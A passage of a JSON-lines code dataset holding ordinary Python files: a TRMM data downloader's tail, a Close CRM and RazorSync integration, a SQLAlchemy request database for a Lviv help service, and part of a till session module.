format\n with gzip.open(outname, 'rb') as gz:\n with open(outname.replace(\".gz\",\"\"), 'wb') as f:\n content = gz.read()\n f.write(content)\n\n os.remove(outname)\n\n\n print(\"downloaded and extracted {0}\".format(os.path.basename(filename)))\n except:\n print(\"failed to download {0}\".format(os.path.basename(filename)))\n\n print(\"Finished downloading TRMM files!\")\n\n return output_files\n\n\nif __name__ == \"__main__\":\n\n start = datetime(2014, 1 ,1)\n end = datetime(2014, 1, 2)\n outfiles = fetch_TRMM(start, end, r\"C:\\Users\\jwely\\Desktop\\troubleshooting\\test\", \"3B42\")\n","repo_name":"NASA-DEVELOP/dnppy","sub_path":"dnppy/download/fetch_TRMM.py","file_name":"fetch_TRMM.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"}
+{"seq_id":"15052999431","text":"from closeio_api import Client as CloseIO_API, APIError\nimport os\nimport requests\nimport json\nimport time\nimport copy\nfrom .format_rs_to_close import format_address_as_string, format_address, format_new_contacts_array, format_opportunity_data, format_note_data, convert_epoch_to_dt\nimport logging\n\n## Initiate Logger\nlog_format = \"[%(asctime)s] %(levelname)s %(message)s\"\nlogging.basicConfig(level=logging.INFO, format=log_format)\n\n## Initiate Close API\napi = CloseIO_API(os.environ.get('CLOSE_API_KEY'))\norg_id = api.get('api_key/' + os.environ.get('CLOSE_API_KEY'))['organization_id']\ndev_api = CloseIO_API(os.environ.get('CLOSE_DEV_API_KEY'))\n\n##############################################\n# Close Methods\n##############################################\n\n## Method to get most recent completed sync time from the Master Lead in the Development Sandbox\n## If we cannot get the most recent completed sync time, we default to 5 minutes before the\n## current time\ndef get_sync_time_from_close(current_time):\n if os.environ.get('MASTER_LEAD_ID'):\n try:\n lead = dev_api.get('lead/' + os.environ.get('MASTER_LEAD_ID'), params={ '_fields': 'custom' })\n if lead['custom'].get('last_sync_time'):\n return int(lead['custom']['last_sync_time'])\n except APIError as e:\n logging.error(\"No Master Lead could be found...\")\n return (current_time - 300000)\n\n## Method to set the sync time on the master lead in Close once a RazorSync sync has been completed at a particular time.\ndef set_sync_time_in_close(last_sync_time):\n if os.environ.get('MASTER_LEAD_ID'):\n try:\n dev_api.put('lead/' + os.environ.get('MASTER_LEAD_ID'), data={ 'custom.last_sync_time': last_sync_time })\n except APIError as e:\n logging.error(\"Could not update sync time on lead because we could not get the master lead...\")\n\n## Method to update an existing address lead in Close with new information if the Customer in RazorSync has been updated.\n## We check the differences in lead name, contacts, and billing address, and make updates where appropriate.\ndef update_lead(lead, addr, cust):\n lead_updates = {}\n name = format_address_as_string(addr)\n contact_names_in_close = { k['display_name'].lower() : k for k in lead['contacts'] }\n if name.strip() != lead['display_name'].strip():\n lead_updates = { 'name': name }\n new_contacts = format_new_contacts_array(cust)\n for contact in new_contacts:\n if contact['name'].lower() in contact_names_in_close:\n close_contact = contact_names_in_close[contact['name'].lower()]\n close_phones_and_emails = [i['email'] for i in close_contact['emails']] + [i['phone'] for i in close_contact['phones']]\n new_contact_phones_and_emails = [i['email'] for i in contact['emails']] + [i['phone'] for i in contact['phones']]\n difference = [i for i in new_contact_phones_and_emails if i not in close_phones_and_emails]\n if difference:\n try:\n if contact.get('date_created'):\n del contact['date_created']\n api.put('contact/' + contact_names_in_close[contact['name'].lower()]['id'], data=contact)\n logging.info(f\"Updated Contact {contact['name']}\")\n except APIError as e:\n logging.error(f\"Failed to update contact {contact_names_in_close[contact['name'].lower()]['id']} because {str(e)}...\")\n else:\n contact['lead_id'] = lead['id']\n try:\n api.post('contact', data=contact)\n logging.info(f\"Posted new contact {contact['name']} on {contact['lead_id']}\")\n except APIError as e:\n logging.error(f\"Failed to post new contact {contact['name']} to lead because 
{str(e)}\")\n if len(cust['Addresses']) > 1:\n billing_address = [i for i in cust['Addresses'] if i.get('AddressTypeId') and address_types.get(i['AddressTypeId']) == \"Billing\"]\n if billing_address:\n billing_address = format_address_as_string(billing_address[0])\n if billing_address != lead['custom'].get('RS Billing Address'):\n lead_updates['custom.RS Billing Address'] = billing_address\n if lead_updates != {}:\n try:\n api.put('lead/' + lead['id'], data=lead_updates)\n logging.info(f\"Successfully Updated {lead['display_name']}\")\n except APIError as e:\n logging.error(f\"Failed to PUT updates on lead because {str(e)}\")\n\n## Method to create a new lead from a new non-billing address in RazorSync\ndef post_new_close_lead(post_addr, post_cust):\n lead_data = {}\n addresses = []\n ## Note: Appartment is intentionally misspelled here because they have a typo in their API\n lead_data['name'] = format_address_as_string(post_addr)\n lead_data['custom.RS Address ID'] = post_addr['Id']\n lead_data['contacts'] = format_new_contacts_array(post_cust)\n if lead_data['name']:\n addresses.append(format_address(post_addr))\n if addresses:\n lead_data['addresses'] = addresses\n\n ## Check if Lead has a billing address\n if len(post_cust['Addresses']) > 1:\n billing_address = [i for i in post_cust['Addresses'] if i.get('AddressTypeId') and address_types.get(i['AddressTypeId']) == \"Billing\"]\n if billing_address:\n lead_data['custom.RS Billing Address'] = format_address_as_string(billing_address[0])\n if lead_data:\n lead_data['custom.Created via RS Integration'] = 'Yes'\n lead_data['status'] = 'Created via RS Integration'\n try:\n lead = api.post('lead', data=lead_data)\n logging.info(f\"Successfully posted {lead['display_name']}\")\n return lead\n except APIError as e:\n logging.error(f\"Failed to post {lead_data['name']} because {str(e)}\")\n return None\n\n## Method to find a close lead using the RS Address ID custom field and searching for an exact match\ndef find_close_lead_from_rs_address_id(address_id):\n resp = api.get('lead', params={ 'query': f\"\\\"custom.RS Address ID\\\":\\\"{address_id}\\\"\", '_fields': 'id,contacts,opportunities,display_name,custom' })\n if resp['data']:\n return resp['data'][0]\n else:\n return None\n\n## Method to find or create a new lead in Close from an RS address and customer record\n## First, we try to find a lead using find_close_lead_from_rs_address_id. If no lead is found,\n## we post one. 
If a lead is found, we try to update it.\ndef find_or_create_close_address_lead_from_customer(addr, cust):\n lead = find_close_lead_from_rs_address_id(addr['Id'])\n if not lead:\n lead = post_new_close_lead(addr, cust)\n else:\n update_lead(lead, addr, cust)\n return lead\n\n## This method takes a service item ID that was deleted in RazorSync, found below, and\n## marks the opportunity on the Close lead that reflects that service item as \"Removed From Work Order\".\ndef update_deleted_service_item_to_deleted(serv_id, opportunities):\n opp = find_potential_close_opp_from_work_order_service_item_id(opportunities, serv_id)\n if opp and opp['status_label'] != 'Removed From Work Order':\n try:\n api.put('opportunity/' + opp['id'], data={ 'status': 'Removed From Work Order' })\n logging.info(f\"Successfully updated {opp['id']} to status Removed From Work Order\")\n except APIError as e:\n logging.error(f\"Failed to update {opp['id']}'s status to removed from work order' because {str(e)}\")\n return None\n\n## Given a Close lead's opportunities and a service item ID as input, this method tries to match\n## a Close opoortunity to a service item ID for updating via note parsing for the given ID.\ndef find_potential_close_opp_from_work_order_service_item_id(opportunities, serv_item_id):\n\n potential_opps = [i for i in opportunities if f\"Work Order Service Item ID: {serv_item_id}\" in i['note'] ]\n if potential_opps:\n return potential_opps[0]\n return None\n\n## This method finds all service items in Close given a lead and a Work Order ID.\ndef get_list_of_service_items_in_close(lead, work_order_id):\n service_item_ids = []\n for opp in lead['opportunities']:\n try:\n ## Check to see if there's a service item ID in the opp note. This is the identifier for RS opportunities. Also check to make sure the Work Order ID itself\n ## matches because a lead can have multiple work orders attached.\n if 'Work Order Service Item ID: ' in opp['note'] and opp['note'].split('Work Order Service Item ID: ')[1].split('\\n')[0].strip() and f\"Work Order ID: {work_order_id}\" in opp['note']:\n service_item_ids.append(opp['note'].split('Work Order Service Item ID: ')[1].split('\\n')[0].strip())\n except IndexError as e:\n logging.error(f\"Failed to find service item ID on {opp['id']} - {lead['id']}\")\n return service_item_ids\n\n## This method tries to update a Close opportunity when a work order service item is updated.\n## We try to find a potential opportunity by service item ID, and if we find one we format the opp_data\n## array like the opps are formatted in Close. 
If no potential opp is found, we post a new opportunity to the lead.\n## If an opp is found, we try to update it if the notes or value don't match.\ndef create_or_update_close_opportunity_from_service_item(serv_item, w_o, lead_data):\n potential_opp = find_potential_close_opp_from_work_order_service_item_id(lead_data['opportunities'], serv_item['Id'])\n opp_data = format_opportunity_data(serv_item, w_o)\n if not potential_opp:\n opp_data['lead_id'] = lead_data['id']\n try:\n opp = api.post('opportunity', data=opp_data)\n logging.info(f\"Successfully created new opportunity for Service Item {serv_item['Id']} - {w_o['Id']} - {opp['id']}\")\n except APIError as e:\n logging.error(f\"Failed to create new opportunity for Service Item {serv_item['Id']} - {w_o['Id']} because {str(e)}\")\n\n else:\n opp = potential_opp\n if opp['note'].strip() != opp_data['note'].strip() or opp.get('value') != opp_data.get('value'):\n try:\n if opp_data.get('date_created'):\n del opp_data['date_created']\n api.put('opportunity/' + opp['id'], data=opp_data)\n logging.info(f\"Successfully updated opportunity for Service Item {serv_item['Id']} - {opp['id']}\")\n except APIError as e:\n logging.error(f\"Failed to update opportunity for Service Item {serv_item['Id']} - {opp['id']} because {str(e)}\")\n\n## Method to find a note in Close via a work_order_id so we can properly update work order notes and\n## not create duplicates. If the note is meant to be a completed note, we look for was completed on.\n## Otherwise, we look for the pattern \"Work Order ID: IDHERE\" in the note.\ndef find_note_for_work_order_by_id(lead_id, work_order_id, was_completed=False):\n try:\n notes = []\n has_more = True\n offset = 0\n while has_more:\n resp = api.get('activity/note', params={ 'lead_id': lead_id, '_skip': offset })\n for note in resp['data']:\n if was_completed:\n if f\"Work Order ID: {work_order_id} was completed on:\" in note['note']:\n return note\n else:\n try:\n if f\"Work Order ID: {work_order_id}\" in note['note'] and not f\"Work Order ID: {work_order_id} was completed on:\" in note['note']:\n return note\n except IndexError as e:\n logging.error(f\"Failed to parse Work Order note on {lead_id} - {work_order_id} - {note['id']}\")\n offset += len(resp['data'])\n has_more = resp['has_more']\n except APIError as e:\n logging.error(f\"Failed to get notes for {lead_id} because {str(e)}\")\n return None\n\n## This method creates or updates work order notes on a lead for a synced work order\ndef create_or_update_close_work_order_notes(serv_items, w_o, lead_data):\n ## Create \"was completed\" note on the lead.\n if w_o['StatusName'] == 'Complete' and not find_note_for_work_order_by_id(lead_id=lead_data['id'], work_order_id=w_o['Id'], was_completed=True):\n note_data = format_note_data(work_order=w_o, was_completed=True)\n note_data['lead_id'] = lead_data['id']\n api.post('activity/note', data=note_data)\n\n ## For any Work Order update, try to find the work order not that was previously created. 
If not, create one.\n\n potential_note = find_note_for_work_order_by_id(lead_id=lead_data['id'], work_order_id=w_o['Id'])\n note_data = format_note_data(work_order=w_o, was_completed=False, service_items=serv_items)\n if not potential_note:\n note_data['lead_id'] = lead_data['id']\n try:\n api.post('activity/note', data=note_data)\n except APIError as e:\n logging.error(f\"Failed to post note to {note_data['lead_id']} because {str(e)}\")\n else:\n if potential_note['note'].strip() != note_data['note'].strip():\n try:\n if note_data.get('date_created'):\n del note_data['date_created']\n api.put('activity/note/' + potential_note['id'], data=note_data)\n except APIError as e:\n logging.error(f\"Failed to update note {potential_note['id']} because {str(e)}\")\n\n## Method to sync RS Work Order statuses to statuses in Close based on a list of RS statuses defined below\ndef find_work_order_statuses_in_close(work_order_statuses):\n try:\n opportunity_statuses = api.get(f\"organization/{org_id}\", params={ '_fields': 'opportunity_statuses'})['opportunity_statuses']\n status_names_in_close = [i['label'] for i in opportunity_statuses]\n if 'Removed From Work Order' not in status_names_in_close:\n try:\n api.post('status/opportunity', data={ 'label': 'Removed From Work Order', 'type': 'lost' })\n except APIError as e:\n logging.error(f'Failed to Create Removed From Work Order Status because {str(e)}')\n\n for work_order_status in work_order_statuses:\n if work_order_status['Name'] not in status_names_in_close:\n status_data = { 'label': work_order_status['Name']}\n status_data['type'] = 'active'\n if 'Complete' in status_data['label']:\n status_data['type'] = 'won'\n elif 'No ' in status_data['label'] or 'cancelled' in status_data['label'].lower():\n status_data['type'] = 'lost'\n try:\n api.post('status/opportunity', data=status_data)\n except APIError as e:\n logging.error(f\"Failed to post status to Close {status_data['label']} because {str(e)}\")\n except Exception as e:\n logging.error(f\"Failed to sync Work Order Statuses to Close because {str(e)}\")\n\n##############################################\n# RazorSync Methods\n##############################################\naddress_types = {}\nwork_order_statuses = {}\nservice_item_dictionary = {}\nrs_users_dictionary = {}\n\n# Initiate RazorSync Request Headers\nrazorsync_headers = {\n \"Host\": f\"{os.environ.get('RAZORSYNC_SERVERNAME').lower()}.0.razorsync.com\",\n \"Token\": f\"{os.environ.get('RAZORSYNC_TOKEN')}\",\n \"Content-type\": 'application/json',\n \"ServerName\": f\"{os.environ.get('RAZORSYNC_SERVERNAME')}\"\n}\n\n# Method to make request to RazorSync API\ndef make_rs_request(method, url_path, params={}, data=None):\n url = f\"https://{os.environ.get('RAZORSYNC_SERVERNAME').lower()}.0.razorsync.com/ApiService.svc/{url_path}\"\n if method.lower() == 'post':\n r = requests.post(url, headers=razorsync_headers, data=json.dumps(data))\n if r.status_code >= 400:\n logging.error(f\"Failed to complete POST for RS Path {url_path}\")\n return [] if 'List' in url_path else []\n try:\n r.json()\n return r.json()\n except Exception as e:\n logging.error(f\"Failed post request to {url_path} because {str(e)}\")\n logging.error(f\"Url: {url}\\nHeaders: {razorsync_headers}\\nData: {data}\")\n return None\n\n\n if method.lower() == 'get':\n r = requests.get(url, headers=razorsync_headers, params=params)\n if r.status_code >= 400:\n logging.error(f\"Failed to complete GET for RS Path {url_path}\")\n return [] if 'List' in url_path else {}\n try:\n 
r.json()\n return r.json()\n except Exception as e:\n logging.error(f\"Failed get request to {url_path} because {str(e)}\")\n logging.error(f\"{r.text}\")\n return None\n\n# This method gets the address types and work order statuses of the RazorSync organization\n# It also makes sure all work order statuses are correctly reflected in Close\ndef get_settings_models():\n try:\n settings_resp = make_rs_request(method=\"GET\", url_path='Settings')\n for k in settings_resp['AddressTypeModels']:\n address_types[k['Id']] = k['Name']\n\n for k in settings_resp['Users']:\n rs_users_dictionary[k['Id']] = f\"{k.get('FirstName') or ''} {k.get('LastName') or ''}\".strip()\n\n ## Make sure all work order statuses are in Close\n find_work_order_statuses_in_close(settings_resp['WorkOrderCustomStatuses'])\n for k in settings_resp['WorkOrderCustomStatuses']:\n work_order_statuses[k['Id']] = k['Name']\n except Exception as e:\n logging.error(f\"Could not get RS Settings Models because {str(e)}\")\n\n# This method gets all the possible service items in the RazorSync organization\ndef get_service_item_dictionary():\n service_items = make_rs_request(method='GET', url_path='ServiceItem/List')\n for k in service_items:\n service_item_dictionary[k['Id']] = k\n\n## This method gets every service item for a work_order_id\ndef get_service_items_for_work_order_id(work_order_id):\n work_order_service_items = make_rs_request(method='GET', url_path=f'WorkOrderServiceItem/List/{work_order_id}')\n for work_order_service_item in work_order_service_items:\n if work_order_service_item['ServiceItemId'] not in service_item_dictionary:\n get_service_item_dictionary()\n if work_order_service_item['ServiceItemId'] in service_item_dictionary:\n work_order_service_item['specifics'] = service_item_dictionary[work_order_service_item['ServiceItemId']]\n return work_order_service_items\n\n## This method finds an address_id based on a service_request_id from a work_order\ndef find_address_id_using_service_request_id(service_request_id):\n if service_request_id:\n service_request = make_rs_request(method=\"GET\", url_path=f\"ServiceRequest/{service_request_id}\")\n return service_request['AddressId']\n return None\n\n## This method processes work order updates where applicable.\ndef process_work_order_updates(work_order, recently_found_leads):\n if (work_order['StatusId'] not in work_order_statuses) or (work_order.get('FieldWorkerId') and work_order['FieldWorkerId'] not in rs_users_dictionary):\n get_settings_models()\n work_order['StatusName'] = work_order_statuses.get(work_order['StatusId'])\n work_order['WorkerName'] = rs_users_dictionary.get(work_order['FieldWorkerId'], \"\") if work_order.get('FieldWorkerId') else \"No Technician Yet\"\n address_id = find_address_id_using_service_request_id(work_order['ServiceRequestId'])\n if not address_id:\n return None\n if recently_found_leads.get(address_id):\n lead = recently_found_leads[address_id]\n else:\n lead = find_close_lead_from_rs_address_id(address_id)\n ## Implement SMS if address doesn't exist for work order\n if not lead:\n return None\n service_items = get_service_items_for_work_order_id(work_order['Id'])\n close_service_item_ids = get_list_of_service_items_in_close(lead, work_order['Id'])\n current_work_order_service_item_ids = [str(i.get('Id')) for i in service_items]\n removed_service_items = [i for i in close_service_item_ids if str(i) not in current_work_order_service_item_ids]\n for service_item in service_items:\n 
create_or_update_close_opportunity_from_service_item(service_item, work_order, lead)\n    create_or_update_close_work_order_notes(service_items, work_order, lead)\n    for serv_id in removed_service_items:\n        update_deleted_service_item_to_deleted(serv_id, lead['opportunities'])\n\n# Start Timezone Capped Search of RS. This is a job that runs on AP Scheduler\ndef search_in_rs():\n    leads_found_this_search = {}\n    current_time = int(time.time()*1000)\n    last_sync_time = get_sync_time_from_close(current_time)\n    mod_dates = { \"FromModifiedDate\": f\"/Date({last_sync_time})/\", \"ToModifiedDate\": f\"/Date({current_time})/\" }\n    customer_list = make_rs_request(method='POST', url_path=\"Customer/List\", data=mod_dates)\n    if customer_list:\n        for customer in customer_list:\n            for address in customer['Addresses']:\n                if address_types.get(address['AddressTypeId'], \"No Type\") != \"Billing\":\n                    lead = find_or_create_close_address_lead_from_customer(address, customer)\n                    leads_found_this_search[address['Id']] = lead\n            logging.info(f\"Found, created, or updated leads for {customer_list.index(customer) + 1} of {len(customer_list)}\")\n    \n    work_orders = make_rs_request(method='POST', url_path=\"WorkOrder/List\", data=mod_dates)\n    for order in work_orders:\n        process_work_order_updates(order, leads_found_this_search)\n        logging.info(f\"Processed Work Order {work_orders.index(order) + 1} of {len(work_orders)}: {order['Id']}\")\n    leads_found_this_search = {}\n    set_sync_time_in_close(current_time)\n    logging.info(f\"Ran sync between {convert_epoch_to_dt(last_sync_time, '%x %I:%M:%S %p')} - {convert_epoch_to_dt(current_time, '%x %I:%M:%S %p')}\")\n\nget_settings_models()\nget_service_item_dictionary()\n","repo_name":"thesixtium/ServiceTitanAPI","sub_path":"custom-razorsync-integration-master/app/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":22188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5607268864","text":"import psycopg2\nfrom sqlalchemy import create_engine, Column, Integer, String, Boolean\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass DatabaseError(Exception):\n def __init__(self, msg):\n self.msg = msg\n super().__init__(msg)\n\n def __repr__(self):\n return f'Database Error: {self.msg}'\n\n\nclass Database:\n def __init__(self, connection_string):\n self.engine = self.init_engine(connection_string)\n self.engine.pool_timeout = 60\n self.Session = sessionmaker(bind=self.engine)\n\n def __del__(self):\n self.engine.dispose()\n\n @staticmethod\n def init_engine(connection_string):\n try:\n engine = create_engine(connection_string, connect_args={\"sslmode\": \"disable\"})\n engine.connect()\n return engine\n except psycopg2.OperationalError as e:\n raise DatabaseError(f'Error with the connection to the database: {str(e)}')\n\n def get_number_of_requests(self, table_class):\n if not DeclarativeBase.__subclasscheck__(table_class):\n raise DatabaseError(f'Table {table_class.__name__} does not exists')\n session = self.Session()\n try:\n return session.query(table_class).filter(table_class.opened).count()\n except SQLAlchemyError as e:\n raise DatabaseError(f'Error while counting requests: {str(e)}')\n finally:\n session.close()\n\n def get_room_requests(self):\n session = self.Session()\n try:\n return session.query(RoomRequest).filter(RoomRequest.opened).all()\n except SQLAlchemyError as e:\n raise DatabaseError(f'Error while getting room requests: {str(e)}')\n finally:\n session.close()\n\n def set_room_request(self, room_request):\n session = self.Session()\n try:\n session.add(room_request)\n session.commit()\n except SQLAlchemyError as e:\n session.rollback()\n raise DatabaseError(f'Error while adding new room request: {str(e)}')\n finally:\n session.close()\n\n def get_supply_requests(self):\n session = self.Session()\n try:\n return session.query(SupplyRequest).filter(SupplyRequest.opened).all()\n except SQLAlchemyError as e:\n raise DatabaseError(f'Error while getting supply requests: {str(e)}')\n finally:\n session.close()\n\n def set_supply_request(self, supply_request):\n session = self.Session()\n try:\n session.add(supply_request)\n session.commit()\n except SQLAlchemyError as e:\n session.rollback()\n raise DatabaseError(f'Error while adding new supply request: {str(e)}')\n finally:\n session.close()\n\n def remove_room_request(self, request_id):\n session = self.Session()\n try:\n room_request = session.query(RoomRequest).filter(RoomRequest.id == request_id).one()\n room_request.opened = False\n session.commit()\n except SQLAlchemyError as e:\n session.rollback()\n raise DatabaseError(f'Error while removing room request with id {request_id}: {str(e)}')\n finally:\n session.close()\n\n def remove_supply_request(self, request_id):\n session = self.Session()\n try:\n room_request = session.query(SupplyRequest).filter(SupplyRequest.id == request_id).one()\n room_request.opened = False\n session.commit()\n except SQLAlchemyError as e:\n session.rollback()\n raise DatabaseError(f'Error while removing supply request with id {request_id}: {str(e)}')\n finally:\n session.close()\n\n\nDeclarativeBase = declarative_base()\n\n\nclass RoomRequest(DeclarativeBase):\n __tablename__ = 'room_requests'\n\n id = Column(Integer, primary_key=True)\n contacts = Column('contacts', String) # application's contact (Elena, +7XXX...)\n timestamp = Column('timestamp', 
String)\n    peoples_count = Column('peoples_count', Integer) # how many people?\n    how_long_in_lviv = Column('how_long_in_lviv', String) # how long in lviv?\n    opened = Column('days_in_room', Boolean, unique=False, default=True) # is the application opened?\n\n    def __repr__(self):\n        return '<RoomRequest {}>'.format(self.id)\n\n\nclass SupplyRequest(DeclarativeBase):\n    __tablename__ = 'supply_requests'\n\n    id = Column(Integer, primary_key=True)\n    timestamp = Column('timestamp', String)\n    contacts = Column('contacts', String) # application's contact (Elena, +7XXX...)\n    subject = Column('peoples_count', String) # application's comment\n    opened = Column('days_in_room', Boolean, unique=False, default=True) # is the application opened?\n\n    def __repr__(self):\n        return '<SupplyRequest {}>'.format(self.id)\n","repo_name":"Egorich42/lviv_help","sub_path":"lviv_help/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25458360713","text":"\"\"\"Starting, ending, and recording totals for sessions.\"\"\"\n\nfrom . import ui, keyboard, td, printer, tillconfig, user, managestock\nfrom . import payment\nfrom . import config\nfrom .models import PayType, Session, SessionTotal, Transaction, zero\nfrom sqlalchemy.orm import undefer\nfrom sqlalchemy.sql import select, func, desc\nfrom .plugins import InstancePluginMount\nfrom decimal import Decimal\nimport datetime\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nsessiontotal_print = config.BooleanConfigItem(\n 'core:sessiontotal_print', True, display_name=\"Print session totals?\",\n description=\"Should session totals be printed after they have been \"\n \"confirmed?\")\n\n\ndef trans_restore():\n \"\"\"Restore deferred transactions\n\n Moves deferred transactions to the current session. Returns a\n list of transactions that were deferred.\n \"\"\"\n sc = Session.current(td.s)\n if sc is None:\n return []\n deferred = td.s.query(Transaction)\\\n .filter(Transaction.sessionid == None)\\\n .all()\n for i in deferred:\n i.session = sc\n td.s.flush()\n return deferred\n\n\nclass ssdialog(ui.dismisspopup):\n \"\"\"Session start dialog box.\"\"\"\n def __init__(self):\n super().__init__(9, 63, title=\"Session date\",\n colour=ui.colour_input,\n dismiss=keyboard.K_CLEAR)\n self.win.drawstr(\n 2, 2, 59, \"Please check the session date, and correct it \"\n \"if necessary.\")\n self.win.drawstr(\n 4, 2, 59, \"Press Cash/Enter to continue and start the session.\")\n self.win.drawstr(6, 2, 14, \"Session date: \", align=\">\")\n date = datetime.datetime.now()\n if date.hour >= 23:\n date = date + datetime.timedelta(days=1)\n self.datefield = ui.datefield(6, 16, f=date, keymap={\n keyboard.K_CASH: (self.key_enter, None)})\n self.datefield.focus()\n\n def key_enter(self):\n date = self.datefield.read()\n if date is None:\n ui.infopopup([\"You must enter a valid date. Every session is \"\n \"recorded against a particular date; this is to \"\n \"ensure the money taken is all recorded on that \"\n \"day even if the session finishes late.\"],\n title=\"Error\")\n return\n self.dismiss()\n sc = Session(date)\n td.s.add(sc)\n td.s.flush()\n deferred = trans_restore()\n td.foodorder_reset()\n log.info(\"Started session number %d\", sc.id)\n user.log(f\"Started session {sc.logref}\")\n payment.notify_session_start(sc)\n printer.kickout()\n if deferred:\n deferred = [\n \"\",\n \"The following deferred transactions were restored:\",\n \"\"] + [f\"{d.id} — {d.notes}\" if d.notes else\n f\"{d.id}\" for d in deferred]\n ui.infopopup([f\"Started session number {sc.id}.\"] + deferred,\n title=\"Session started\", colour=ui.colour_info,\n dismiss=keyboard.K_CASH)\n\n\n@user.permission_required(\"start-session\", \"Start a session\")\ndef start():\n \"\"\"Start a session if there is not already one in progress.\n \"\"\"\n sc = Session.current(td.s)\n if sc:\n log.info(\"Start session: session %d still in progress\", sc.id)\n ui.infopopup(\n [f\"There is already a session in progress (number {sc.id}, \"\n f\"started {sc.starttime:%H:%M on %A}).\"],\n title=\"Error\")\n else:\n ssdialog()\n\n\ndef checkendsession():\n sc = Session.current(td.s)\n if sc is None:\n log.info(\"End session: no session in progress\")\n ui.infopopup([\"There is no session in progress.\"], title=\"Error\")\n return\n if sc.incomplete_transactions:\n log.info(\"End session: there are incomplete transactions\")\n ui.infopopup(\n [\"There are incomplete transactions. 
After dismissing \"\n \"this message, use the 'Recall Trans' button to find \"\n \"them, and either complete them, cancel them \"\n \"or defer them.\"],\n title=\"Error\")\n return\n return sc\n\n\ndef confirmendsession():\n r = checkendsession()\n if not r:\n return\n # Check that the printer has paper before ending the session\n pp = printer.driver.offline()\n if pp:\n ui.infopopup([\"Could not end the session: there is a problem with \"\n f\"the printer: {pp}\"], title=\"Printer problem\")\n return\n r.endtime = datetime.datetime.now()\n log.info(\"End of session %d confirmed.\", r.id)\n user.log(f\"Ended session {r.logref}\")\n ui.infopopup([f\"Session {r.id} has ended.\",\n \"\",\n \"Please count the cash in the drawer and enter the \"\n \"actual amounts using management option 1, 3.\"],\n title=\"Session Ended\", colour=ui.colour_info,\n dismiss=keyboard.K_CASH)\n ui.toast(\"Printing the countup sheet.\")\n with ui.exception_guard(\"printing the session countup sheet\",\n title=\"Printer error\"):\n printer.print_sessioncountup(r)\n printer.kickout()\n managestock.stock_purge_internal(source=\"session end\")\n payment.notify_session_end(r)\n\n\n@user.permission_required(\"end-session\", \"End a session\")\ndef end():\n \"\"\"End the current session if there is one.\n \"\"\"\n r = checkendsession()\n if r:\n km = {keyboard.K_CASH: (confirmendsession, None, True)}\n log.info(\"End session popup: asking for confirmation\")\n ui.infopopup([\"Press Cash/Enter to confirm you want to end \"\n f\"session number {r.id}.\"], title=\"Session End\",\n keymap=km, colour=ui.colour_confirm)\n\n\ndef sessionlist(cont, paidonly=False, unpaidonly=False, closedonly=False,\n maxlen=None):\n \"\"\"Return a list of sessions suitable for a menu.\n \"\"\"\n q = td.s.query(Session)\\\n .order_by(desc(Session.id))\\\n .options(undefer('total'))\n if paidonly:\n q = q.filter(select([func.count(SessionTotal.sessionid)],\n whereclause=SessionTotal.sessionid == Session.id)\n .correlate(Session.__table__).as_scalar() != 0)\n if unpaidonly:\n q = q.filter(select([func.count(SessionTotal.sessionid)],\n whereclause=SessionTotal.sessionid == Session.id)\n .correlate(Session.__table__).as_scalar() == 0)\n if closedonly:\n q = q.filter(Session.endtime != None)\n if maxlen:\n q = q[:maxlen]\n f = ui.tableformatter(' r l r ')\n return [(f(x.id, x.date, tillconfig.fc(x.total)), cont, (x.id,))\n for x in q]\n\n\nclass _PMWrapper:\n \"\"\"Payment method wrapper for record session takings popup.\n\n Remembers the total and where to put it when it's updated.\n \"\"\"\n def __init__(self, paytype_id, till_total, popup):\n self.paytype_id = paytype_id\n pt = td.s.query(PayType).get(paytype_id)\n self.description = pt.description\n self.total_fields = pt.driver.total_fields\n self.lines = 1 if len(self.total_fields) <= 1 \\\n else len(self.total_fields) + 1\n self.till_total = till_total\n self.actual_total = zero\n self.fees = zero\n self.total_valid = False\n self.total_problem = \"\"\n self.fields = []\n self.popup = popup\n\n def create_total_labels(self, y):\n self.total_label = ui.label(\n y, self.popup.atx, self.popup.ffw, align=\">\")\n self.fees_label = ui.label(\n y, self.popup.ftx, self.popup.ffw, align=\">\")\n\n def display_total(self):\n if self.total_valid:\n self.total_label.set(tillconfig.fc(self.actual_total))\n self.fees_label.set(tillconfig.fc(self.fees))\n else:\n self.total_label.set(\"Error\", colour=ui.colour_error)\n self.fees_label.set(\"Error\", colour=ui.colour_error)\n\n def update_total(self):\n pt = 
td.s.query(PayType).get(self.paytype_id)\n try:\n self.actual_total, self.fees = pt.driver.total(\n self.popup.sessionid, [f.f for f in self.fields])\n self.total_valid = True\n self.total_problem = \"\"\n except Exception as e:\n self.actual_total = zero\n self.total_valid = False\n self.total_problem = str(e)\n self.display_total()\n self.popup.update_total()\n\n\nclass record(ui.dismisspopup):\n \"\"\"Record the takings for a session.\n\n This popup queries all the payment methods to find out which\n fields need to be displayed.\n\n Pass a Session ID to this class.\n \"\"\"\n ttx = 30\n atx = 45\n ftx = 60\n ff = \"{:>13}\"\n ffw = 13\n\n def __init__(self, sessionid):\n log.info(\"Record session takings popup: session %d\", sessionid)\n self.sessionid = sessionid\n s = td.s.query(Session).get(sessionid)\n if not self.session_valid(s):\n return\n for i in SessionHooks.instances:\n if i.preRecordSessionTakings(s.id):\n return\n paytotals = dict(s.payment_totals)\n payment_methods = td.s.query(PayType)\\\n .filter(PayType.mode != \"disabled\")\\\n .order_by(PayType.order, PayType.paytype)\\\n .all()\n # Check that all payment methods are correctly configured\n for pm in payment_methods:\n if not pm.driver.config_valid:\n ui.infopopup(\n [f\"The {pm.description} payment method is not configured \"\n f\"correctly.\",\n \"\",\n f\"The problem is: {pm.driver.config_problem}\"],\n title=\"Error\")\n return\n self.pms = [\n _PMWrapper(pt.paytype, paytotals.get(pt, zero), self)\n for pt in payment_methods]\n self.till_total = s.total\n # How tall does the window need to be? Each payment type\n # takes a minimum of one line; if len(pt.total_fields()) > 1\n # then it takes len(pt.total_fields()) + 1 lines\n h = sum(pm.lines for pm in self.pms)\n # We also need the top border (2), a 